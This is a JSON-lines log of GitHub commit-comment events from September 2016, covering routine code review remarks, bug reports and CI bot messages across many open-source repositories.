{"id":"4521139366","type":"CommitCommentEvent","actor":{"login":"tomjenkinson"},"repo":{"name":"jbosstm/ci-report-generator"},"payload":{"comment":{"id":18910542,"position":null,"line":null,"path":null,"commit_id":"06ccebfb50da62f80ecc195657e6f476cf847a92","created_at":"2016-09-06T12:58:32Z","updated_at":"2016-09-06T12:58:32Z","body":"I was adding the comment here as a courtesy to explain the (new) top commit. I appreciate I wasn't clear, sorry about that."}},"created_at":"2016-09-06T12:58:32Z"}
{"id":"4521141809","type":"CommitCommentEvent","actor":{"login":"azzurrip"},"repo":{"name":"vhbb/cmssw"},"payload":{"comment":{"id":18910544,"position":null,"line":null,"path":null,"commit_id":"57b65f6a5d25feb2c99164d9e1c7cca559d00e72","created_at":"2016-09-06T12:59:00Z","updated_at":"2016-09-06T12:59:00Z","body":"This modification seems to have disabled the storing of events with V+2jets with jets in the forward regions. If it is just a mistake, it the storing of V+forward jets should be restored by going back to the jetsForHiggsAll also in the Vtype>=0 cases. ie.\r\n if not  ( len(event.jetsForHiggsAll) >= 2  or ... "}},"created_at":"2016-09-06T12:59:00Z"}
{"id":"4521143011","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18910548,"position":null,"line":null,"path":null,"commit_id":"78d9a5cbb2a9d98f3692177cac7fa38c80de0f9f","created_at":"2016-09-06T12:59:15Z","updated_at":"2016-09-06T12:59:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QsTos_50RzCzRQmaVXriDA"}},"created_at":"2016-09-06T12:59:15Z"}
{"id":"4521144681","type":"CommitCommentEvent","actor":{"login":"Swyter"},"repo":{"name":"swconquest/swconquest-fix-dialogs"},"payload":{"comment":{"id":18910550,"position":null,"line":null,"path":null,"commit_id":"b9b63dc82f1dae05fe1763c4a6420d728b5e2f99","created_at":"2016-09-06T12:59:34Z","updated_at":"2016-09-06T12:59:34Z","body":"@16164657  I thought he was being ironic."}},"created_at":"2016-09-06T12:59:34Z"}
{"id":"4521152545","type":"CommitCommentEvent","actor":{"login":"wanglimin"},"repo":{"name":"wanglimin/dense_flow"},"payload":{"comment":{"id":18910573,"position":null,"line":null,"path":null,"commit_id":"a25f28a5bb14199b5c158ceb4d3a7b737ee0aade","created_at":"2016-09-06T13:01:04Z","updated_at":"2016-09-06T13:01:04Z","body":"path1: where you store the video clips.\r\npath2: where you store the optical flow images\r\npath3: where you store the rgb frames of videos."}},"created_at":"2016-09-06T13:01:04Z"}
{"id":"4521154450","type":"CommitCommentEvent","actor":{"login":"robsonpeixoto"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18910580,"position":null,"line":null,"path":null,"commit_id":"b69fb50645363d8d9a430b12d41f27995f3ee722","created_at":"2016-09-06T13:01:26Z","updated_at":"2016-09-06T13:01:26Z","body":"Which gem I need to install to Intellisense works ?\r\nThanks"}},"created_at":"2016-09-06T13:01:26Z"}
{"id":"4521154799","type":"CommitCommentEvent","actor":{"login":"onmyway133"},"repo":{"name":"bakkenbaeck/iOS-playbook"},"payload":{"comment":{"id":18910583,"position":6,"line":12,"path":"README.md","commit_id":"4200bc8e1f7dd192c6abc2dce7cce7f70473969c","created_at":"2016-09-06T13:01:30Z","updated_at":"2016-09-06T13:01:30Z","body":"@3lvis I just think that it is better for this to be referred as a team "}},"created_at":"2016-09-06T13:01:30Z"}
{"id":"4521155010","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18910584,"position":null,"line":null,"path":null,"commit_id":"9205efda02a788084a332bff06733572a338b132","created_at":"2016-09-06T13:01:32Z","updated_at":"2016-09-06T13:01:32Z","body":"`#define CRYPTOPP_CONSTANT(x) constexpr static int x;` was picked up as suggested at [static const Member Value vs. Member enum : Which Method is Better & Why?](http://stackoverflow.com/a/211180/608639)"}},"created_at":"2016-09-06T13:01:32Z"}
{"id":"4521157200","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18910586,"position":null,"line":null,"path":null,"commit_id":"7587d702beca7d95638206b1cc03e2908b912253","created_at":"2016-09-06T13:01:58Z","updated_at":"2016-09-06T13:01:58Z","body":"To PRE"}},"created_at":"2016-09-06T13:01:58Z"}
{"id":"4521157671","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"bakkenbaeck/iOS-playbook"},"payload":{"comment":{"id":18910588,"position":6,"line":12,"path":"README.md","commit_id":"4200bc8e1f7dd192c6abc2dce7cce7f70473969c","created_at":"2016-09-06T13:02:05Z","updated_at":"2016-09-06T13:02:05Z","body":"I don't understand, could you explain, please?"}},"created_at":"2016-09-06T13:02:05Z"}
{"id":"4521157689","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18910589,"position":null,"line":null,"path":null,"commit_id":"7587d702beca7d95638206b1cc03e2908b912253","created_at":"2016-09-06T13:02:05Z","updated_at":"2016-09-06T13:02:05Z","body":"To PRO"}},"created_at":"2016-09-06T13:02:05Z"}
{"id":"4521161347","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18910599,"position":null,"line":null,"path":null,"commit_id":"59aad798ebb5302c9b62285c3a9a0d2878cb68e3","created_at":"2016-09-06T13:02:49Z","updated_at":"2016-09-06T13:02:49Z","body":"Reported by Marcel Raad at [VS2015 and MinGW testing of constexpr dev-branch](http://groups.google.com/d/msg/cryptopp-users/qeZVbY9cHJc/utM06ZUxFAAJ)"}},"created_at":"2016-09-06T13:02:49Z"}
{"id":"4521162754","type":"CommitCommentEvent","actor":{"login":"welydl"},"repo":{"name":"welydl/mygvim74"},"payload":{"comment":{"id":18910601,"position":19,"line":876,"path":"gvimrc","commit_id":"fbeda980ae7455f188ac60c84efe25d7efdb9fad","created_at":"2016-09-06T13:03:09Z","updated_at":"2016-09-06T13:03:09Z","body":"tet"}},"created_at":"2016-09-06T13:03:09Z"}
{"id":"4521163589","type":"CommitCommentEvent","actor":{"login":"discoduck2x"},"repo":{"name":"StianOvrevage/telegraf"},"payload":{"comment":{"id":18910602,"position":null,"line":null,"path":null,"commit_id":"3ce6b3ded0c2aed446bce94578690434be3e431b","created_at":"2016-09-06T13:03:18Z","updated_at":"2016-09-06T13:03:18Z","body":"Hi @StianOvrevage \r\n\r\nIf i only would be interested in certain interfaces and not all details , say only interface names & in&out octets , how should the configuration look then? (is it even possible)"}},"created_at":"2016-09-06T13:03:18Z"}
{"id":"4521164401","type":"CommitCommentEvent","actor":{"login":"cdeterman"},"repo":{"name":"cdeterman/gpuR"},"payload":{"comment":{"id":18910603,"position":null,"line":null,"path":null,"commit_id":"ebe17c6f67a197da548911022f21aeb6b7041bbc","created_at":"2016-09-06T13:03:27Z","updated_at":"2016-09-06T13:03:27Z","body":"This is very interesting. I have been fighting an issue with Windows installs that I think may be related to this in issue #9.  I could potentially remove it but then I would need to require users to setup there own contexts for each device of interest.  This is possible but I wanted to have the simplest setup available so users could just load and begin working with the gpu objects.  I will see if removing that fixes the install issue and evaluate if removing it is really what would be best."}},"created_at":"2016-09-06T13:03:27Z"}
{"id":"4521171416","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18910615,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T13:04:49Z","updated_at":"2016-09-06T13:04:49Z","body":"@Nadahar Just concerning this line of code, the \"channels=\" that you hardcoded could be automatically changed to 1 when detected by MediaInfo, and \"-ac\" value should be adequately changed.\r\n2 being staying the default value.\r\n\r\nFor an other partial change that need to be done as well see the PR comment."}},"created_at":"2016-09-06T13:04:49Z"}
{"id":"4521173595","type":"CommitCommentEvent","actor":{"login":"136667runi"},"repo":{"name":"136667runi/233041-sedona"},"payload":{"comment":{"id":18910620,"position":null,"line":null,"path":null,"commit_id":"04d8dd4ce1ef556d27349e6cc745d90f32eedaf2","created_at":"2016-09-06T13:05:14Z","updated_at":"2016-09-06T13:05:14Z","body":"Добавлено имя наставника"}},"created_at":"2016-09-06T13:05:14Z"}
{"id":"4521176210","type":"CommitCommentEvent","actor":{"login":"omega"},"repo":{"name":"johanhar/javazone2016-angular2-workshop"},"payload":{"comment":{"id":18910624,"position":96,"line":922,"path":"README.md","commit_id":"dac0949343c21c5ab915f934f6629e730a83b2aa","created_at":"2016-09-06T13:05:43Z","updated_at":"2016-09-06T13:05:43Z","body":"Jeg stoppet på at jeg fikk `Missing '('` når jeg la til `@Output`, fordi det manglet `()` på slutten av linjen (jeg var ukjent med TypeScript).\r\n\r\nLinjen hadde vært mer komplett slik:\r\n\r\n```\r\n@Output() onMyEvent:EventEmitter<MyPayloadType> = new EventEmitter<MyPayloadType>()\r\n```"}},"created_at":"2016-09-06T13:05:43Z"}
{"id":"4521177512","type":"CommitCommentEvent","actor":{"login":"elyezer"},"repo":{"name":"kbidarkar/robottelo-ci"},"payload":{"comment":{"id":18910625,"position":122,"line":125,"path":"jobs/satellite6-automation.yaml","commit_id":"c3dfa4513fdb31ecbbf50856601393acca9df62d","created_at":"2016-09-06T13:05:57Z","updated_at":"2016-09-06T13:05:57Z","body":"This is being repeated let's create a macro"}},"created_at":"2016-09-06T13:05:57Z"}
{"id":"4521189200","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18910647,"position":24,"line":88,"path":"xwiki-platform-core/xwiki-platform-activeinstalls/xwiki-platform-activeinstalls-server/xwiki-platform-activeinstalls-server-api/src/main/java/org/xwiki/activeinstalls/server/DataManager.java","commit_id":"7f7e1fe9d7bf6ddd0297292519c0a8c2ed908f8f","created_at":"2016-09-06T13:08:14Z","updated_at":"2016-09-06T13:08:14Z","body":"Maybe it failed because there's a missing `}` here."}},"created_at":"2016-09-06T13:08:14Z"}
{"id":"4521190285","type":"CommitCommentEvent","actor":{"login":"136667runi"},"repo":{"name":"136667runi/233041-sedona"},"payload":{"comment":{"id":18910648,"position":null,"line":null,"path":null,"commit_id":"04d8dd4ce1ef556d27349e6cc745d90f32eedaf2","created_at":"2016-09-06T13:08:25Z","updated_at":"2016-09-06T13:08:25Z","body":"Добавлено имя наставника"}},"created_at":"2016-09-06T13:08:25Z"}
{"id":"4521190473","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18910651,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T13:08:27Z","updated_at":"2016-09-06T13:08:27Z","body":"Yeah, that was unlikely… I was trying to fix sensors on N, which was about userspace permissions after all. These blobs actually break quite a bit of functionality (e.g., audio, OMX, etc). The regular M blobs work perfectly fine on N (except Widevine, which was pretty much expected)."}},"created_at":"2016-09-06T13:08:27Z"}
{"id":"4521194237","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"hiroki-fujihara/ToDoList2"},"payload":{"comment":{"id":18910657,"position":null,"line":null,"path":null,"commit_id":"332389440a51848f687b9e9363b9c4037d9d12d7","created_at":"2016-09-06T13:09:12Z","updated_at":"2016-09-06T13:09:12Z","body":"課題提出終了です。\r\n遅れてしまって申し訳ありませんでした。\r\nherokuのアドレス→https://immense-garden-56117.herokuapp.com/tasks"}},"created_at":"2016-09-06T13:09:12Z"}
{"id":"4521203541","type":"CommitCommentEvent","actor":{"login":"sadhyama"},"repo":{"name":"sadhyama/parodus"},"payload":{"comment":{"id":18910681,"position":null,"line":null,"path":null,"commit_id":"f247557e929fc7a420966b39777cc13953e2f823","created_at":"2016-09-06T13:10:55Z","updated_at":"2016-09-06T13:10:55Z","body":"Currently, nanomsg is integrated to parodus and added the code changes to integrate with webpacore. This changes are yet to be tested."}},"created_at":"2016-09-06T13:10:55Z"}
{"id":"4521205058","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18910687,"position":24,"line":88,"path":"xwiki-platform-core/xwiki-platform-activeinstalls/xwiki-platform-activeinstalls-server/xwiki-platform-activeinstalls-server-api/src/main/java/org/xwiki/activeinstalls/server/DataManager.java","commit_id":"7f7e1fe9d7bf6ddd0297292519c0a8c2ed908f8f","created_at":"2016-09-06T13:11:16Z","updated_at":"2016-09-06T13:11:16Z","body":"Yes it's probably the issue. I just assumed it was not linking getting } inside the content and did not debugged much."}},"created_at":"2016-09-06T13:11:16Z"}
{"id":"4521207096","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18910690,"position":null,"line":null,"path":null,"commit_id":"b9658aca168a5aac74dbb214c46015452ea40b38","created_at":"2016-09-06T13:11:37Z","updated_at":"2016-09-06T13:11:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TgZhDv4g&#x2F;1978-bug-987992-doc-rbd-format-2-is-default-in-ses-3-0-documentation-needs-to-be-updated\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 987992 - [doc] RBD format 2 is default in SES 3.0 -&gt; documentation needs to be updated</a>"}},"created_at":"2016-09-06T13:11:37Z"}
{"id":"4521209404","type":"CommitCommentEvent","actor":{"login":"Fulgen301"},"repo":{"name":"Fulgen301/oc_hazard"},"payload":{"comment":{"id":18910695,"position":null,"line":null,"path":null,"commit_id":"6f9993c1ca4bd0eff7fa37506990e39e64a88ff6","created_at":"2016-09-06T13:12:02Z","updated_at":"2016-09-06T13:12:02Z","body":"Why did you remove the access modifiers?"}},"created_at":"2016-09-06T13:12:02Z"}
{"id":"4521209929","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18910697,"position":13,"line":477,"path":"src/support.cpp","commit_id":"0c6aca19aa659bd8a7491366b20f70a78bb51e3b","created_at":"2016-09-06T13:12:09Z","updated_at":"2016-09-06T13:12:09Z","body":"This setting doesn't exist yet: `support_interface_skip_height`.\r\nI'm also not entirely sure it is a good name for the setting. I see what you meant from a technical perspective, but perhaps something like \"Support Interface Accuracy\" is more likely to guide what the user should expect from the setting."}},"created_at":"2016-09-06T13:12:09Z"}
{"id":"4521214917","type":"CommitCommentEvent","actor":{"login":"virtualize"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18910706,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-06T13:12:50Z","updated_at":"2016-09-06T13:12:50Z","body":"Why was this done? There seems to be no logic reason in introducing such a huge BC break. Can we please have at lease some notice?"}},"created_at":"2016-09-06T13:12:50Z"}
{"id":"4521215759","type":"CommitCommentEvent","actor":{"login":"tahonermann"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18910708,"position":24,"line":22,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T13:12:59Z","updated_at":"2016-09-06T13:12:59Z","body":"<tt>-Werror</tt> is indeed problematic at times.  For example, gcc's issuance of a warning sometimes depends on the optimization level.  Users shouldn't be subjected to the use of <tt>-Werror</tt> here though; this <tt>CMakeLists.txt</tt> file is only used to build the <tt>Text_view</tt> tests and examples, run them, and perform the installation.  I looked into having the installation provide a TextViewConfig.cmake file for <tt>cmake</tt> based consumers to use, but then decided not to invest the time right now trying to figure out how that is supposed to be done.  Since <tt>Text_view</tt> is usable as a header-only library (for now), I assume any changes needed by consumer build systems will be trivial anyway."}},"created_at":"2016-09-06T13:12:59Z"}
{"id":"4521215993","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18910710,"position":34,"line":493,"path":"src/support.cpp","commit_id":"0c6aca19aa659bd8a7491366b20f70a78bb51e3b","created_at":"2016-09-06T13:13:02Z","updated_at":"2016-09-06T13:13:02Z","body":"These two could be made constant."}},"created_at":"2016-09-06T13:13:02Z"}
{"id":"4521221325","type":"CommitCommentEvent","actor":{"login":"davidyem"},"repo":{"name":"davidyem/-summary"},"payload":{"comment":{"id":18910719,"position":null,"line":null,"path":null,"commit_id":"fc4baa572d968bd4e4d1abbde5fd319ff32fe2d7","created_at":"2016-09-06T13:14:01Z","updated_at":"2016-09-06T13:14:01Z","body":"new\r\n"}},"created_at":"2016-09-06T13:14:01Z"}
{"id":"4521224290","type":"CommitCommentEvent","actor":{"login":"whizzkid"},"repo":{"name":"pixijs/pixi.js"},"payload":{"comment":{"id":18910728,"position":null,"line":null,"path":null,"commit_id":"d2dd381e791225919a4fe948c333cd637d8f3266","created_at":"2016-09-06T13:14:36Z","updated_at":"2016-09-06T13:14:36Z","body":"current dev build is outputting GLShader stuff in console ?\r\n"}},"created_at":"2016-09-06T13:14:36Z"}
{"id":"4521225051","type":"CommitCommentEvent","actor":{"login":"gcbartlett"},"repo":{"name":"rueX/ControlPlane"},"payload":{"comment":{"id":18910730,"position":null,"line":null,"path":null,"commit_id":"8e51f8aebcd06dc7f4f8b69547e353562262487d","created_at":"2016-09-06T13:14:45Z","updated_at":"2016-09-06T13:14:45Z","body":"What about using the icon color of the context with the highest confidence level?  That way a user could adjust the confidence levels to set a priority for icon colors."}},"created_at":"2016-09-06T13:14:45Z"}
{"id":"4521227584","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18910735,"position":37,"line":496,"path":"src/support.cpp","commit_id":"0c6aca19aa659bd8a7491366b20f70a78bb51e3b","created_at":"2016-09-06T13:15:16Z","updated_at":"2016-09-06T13:15:16Z","body":"Unnecessary brackets. Removed them for you in 2b6c70d19c34ddeddd4b4165ff96913e4b220500."}},"created_at":"2016-09-06T13:15:16Z"}
{"id":"4521229652","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18910737,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T13:15:38Z","updated_at":"2016-09-06T13:15:38Z","body":"There is a solution how to fix what I wrote above?"}},"created_at":"2016-09-06T13:15:38Z"}
{"id":"4521231362","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18910739,"position":null,"line":null,"path":null,"commit_id":"081a097cae32eebb835d8e1afc8699836211b582","created_at":"2016-09-06T13:15:56Z","updated_at":"2016-09-06T13:15:56Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/409/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1969)."}},"created_at":"2016-09-06T13:15:56Z"}
{"id":"4521235109","type":"CommitCommentEvent","actor":{"login":"andreak"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18910743,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T13:16:37Z","updated_at":"2016-09-06T13:16:37Z","body":"What's with this restriction?\r\nThis prevents using a very useful feature, text-search using \"startsWith\"; ```WHERE fts_col @@ to_tsquery('simple', 'andre:*')```.\r\nIs this a temporary restriction or is there some kind of inherently difficulty having this?"}},"created_at":"2016-09-06T13:16:37Z"}
{"id":"4521239853","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18910748,"position":4,"line":2333,"path":"application/src/main/webapp/js/chat.js","commit_id":"4727f969cb195f7e132f2c72394b08e320849cbf","created_at":"2016-09-06T13:17:31Z","updated_at":"2016-09-06T13:17:31Z","body":"Can you add comments to explain the purpose of this code please ?"}},"created_at":"2016-09-06T13:17:31Z"}
{"id":"4521240755","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18910749,"position":188,"line":260,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T13:17:41Z","updated_at":"2016-09-06T13:17:41Z","body":"OK, but I'd still call `codegen.frameMap.getIndex(functionDescriptor.valueParameters.last())` instead for clarity"}},"created_at":"2016-09-06T13:17:41Z"}
{"id":"4521241537","type":"CommitCommentEvent","actor":{"login":"gmmowry"},"repo":{"name":"collinL34/phase-0-tracks"},"payload":{"comment":{"id":18910751,"position":null,"line":null,"path":null,"commit_id":"67faea065f1078b8bc3cf84c5186eebdb5569f94","created_at":"2016-09-06T13:17:50Z","updated_at":"2016-09-06T13:17:50Z","body":"@collinL34 sure thing! "}},"created_at":"2016-09-06T13:17:50Z"}
{"id":"4521248936","type":"CommitCommentEvent","actor":{"login":"Nichol4s"},"repo":{"name":"surfly/API"},"payload":{"comment":{"id":18910765,"position":null,"line":null,"path":null,"commit_id":"17e50671f128286aee4cbf86fb61cbec09bb0660","created_at":"2016-09-06T13:19:17Z","updated_at":"2016-09-06T13:19:17Z","body":"__API Description file syntax error on line 973__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-06T13:19:17Z"}
{"id":"4521251291","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910768,"position":21,"line":21,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:19:43Z","updated_at":"2016-09-06T13:19:43Z","body":"module.exports = Names;"}},"created_at":"2016-09-06T13:19:43Z"}
{"id":"4521251621","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18910770,"position":null,"line":null,"path":null,"commit_id":"11b2709fd1cdb7b8e8028a004d36448327755730","created_at":"2016-09-06T13:19:46Z","updated_at":"2016-09-06T13:19:46Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/410/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1969)."}},"created_at":"2016-09-06T13:19:46Z"}
{"id":"4521252446","type":"CommitCommentEvent","actor":{"login":"cappadona"},"repo":{"name":"cul-it/mann-wagon"},"payload":{"comment":{"id":18910771,"position":null,"line":null,"path":null,"commit_id":"2eeae7cbecb06781f11dda475bc650a0aee63152","created_at":"2016-09-06T13:19:55Z","updated_at":"2016-09-06T13:19:55Z","body":"Sounds like this could be related to (and address) the issue I was having passing the `events-path` variable..."}},"created_at":"2016-09-06T13:19:55Z"}
{"id":"4521255535","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910776,"position":20,"line":20,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:20:30Z","updated_at":"2016-09-06T13:20:30Z","body":"module.exports = Names;"}},"created_at":"2016-09-06T13:20:30Z"}
{"id":"4521256751","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"meatballs/xontrib-thefuck"},"payload":{"comment":{"id":18910777,"position":null,"line":null,"path":null,"commit_id":"8a929963884888270a5774afa8b1e1060a20d50e","created_at":"2016-09-06T13:20:44Z","updated_at":"2016-09-06T13:20:44Z","body":"please report this as an issue on xonsh"}},"created_at":"2016-09-06T13:20:44Z"}
{"id":"4521257448","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910779,"position":20,"line":20,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:20:51Z","updated_at":"2016-09-06T13:20:51Z","body":"module.exports = Names;"}},"created_at":"2016-09-06T13:20:51Z"}
{"id":"4521258967","type":"CommitCommentEvent","actor":{"login":"cyilcode"},"repo":{"name":"cyilcode/WController"},"payload":{"comment":{"id":18910785,"position":119,"line":240,"path":"src/WCS.MAIN/Functions/osxFunctions.cs","commit_id":"3ca4529e774c76d872ccabdb0250bcd49e53a3e8","created_at":"2016-09-06T13:21:10Z","updated_at":"2016-09-06T13:21:10Z","body":"I probably should also be posting key_up event. Will make sure if i can find a real mac device because its not needed on vm."}},"created_at":"2016-09-06T13:21:10Z"}
{"id":"4521260296","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910786,"position":7,"line":7,"path":"Node_random/server.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:21:24Z","updated_at":"2016-09-06T13:21:24Z","body":"var vasya = new Names();"}},"created_at":"2016-09-06T13:21:24Z"}
{"id":"4521260632","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18910787,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T13:21:28Z","updated_at":"2016-09-06T13:21:28Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T13:21:28Z"}
{"id":"4521263215","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910791,"position":5,"line":5,"path":"Node_random/server.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:21:56Z","updated_at":"2016-09-06T13:21:56Z","body":"var Names = require('./storage/user');"}},"created_at":"2016-09-06T13:21:56Z"}
{"id":"4521264466","type":"CommitCommentEvent","actor":{"login":"alexmaul"},"repo":{"name":"pytroll/pytroll-schedule"},"payload":{"comment":{"id":18910792,"position":null,"line":null,"path":null,"commit_id":"9becb258ee2368c29e5d34d63ba4d28d8730746f","created_at":"2016-09-06T13:22:12Z","updated_at":"2016-09-06T13:22:12Z","body":"Hi Martin,\r\nit seems this commit doesn't work well ...\r\nI merged it with my fork and it broke, sort of.\r\nThe last lines of the stacktrace:\r\n>  File \"/home/amaul/GIT/pytroll-schedule/trollsched/satpass.py\", line 433, in get_next_passes\r\n>      overpass.boundary = SwathBoundary(overpass)\r\n>  AttributeError: can't set attribute\r\n"}},"created_at":"2016-09-06T13:22:12Z"}
{"id":"4521264748","type":"CommitCommentEvent","actor":{"login":"msarahan"},"repo":{"name":"mingwandroid/conda-build"},"payload":{"comment":{"id":18910793,"position":null,"line":null,"path":null,"commit_id":"f14d2e0e59d0999c89f07746e94cac27fc1a2a30","created_at":"2016-09-06T13:22:15Z","updated_at":"2016-09-06T13:22:15Z","body":"Sure, not controversial at all.  Go ahead and put a PR up."}},"created_at":"2016-09-06T13:22:15Z"}
{"id":"4521269642","type":"CommitCommentEvent","actor":{"login":"TkachenkoArtem"},"repo":{"name":"TkachenkoArtem/raienko.github.io"},"payload":{"comment":{"id":18910806,"position":4,"line":4,"path":"index.html","commit_id":"b2909e6802281c1f5465ba96ec4caf597696d0a3","created_at":"2016-09-06T13:23:04Z","updated_at":"2016-09-06T13:23:04Z","body":"Cool!"}},"created_at":"2016-09-06T13:23:04Z"}
{"id":"4521271059","type":"CommitCommentEvent","actor":{"login":"tahonermann"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18910810,"position":25,"line":23,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T13:23:19Z","updated_at":"2016-09-06T13:23:19Z","body":"Ah, right, that didn't occur to me.  I removed the redundant options in commit 8e74b4075b1e9e29bb05ecdb695422f4843a73e6."}},"created_at":"2016-09-06T13:23:19Z"}
{"id":"4521272254","type":"CommitCommentEvent","actor":{"login":"kachkaev"},"repo":{"name":"toxicFork/react-three-renderer-example"},"payload":{"comment":{"id":18910816,"position":8,"line":8,"path":"src/examples/GeometryShapes/Resources.js","commit_id":"839706564d971ebb0fc77d40dbf02a7d8de41069","created_at":"2016-09-06T13:23:29Z","updated_at":"2016-09-06T13:23:29Z","body":"Cool! The same thing seems to be happening in `src/examples/GeometryShapes/Resources.js`. But there's more heavy stuff in `render()`."}},"created_at":"2016-09-06T13:23:29Z"}
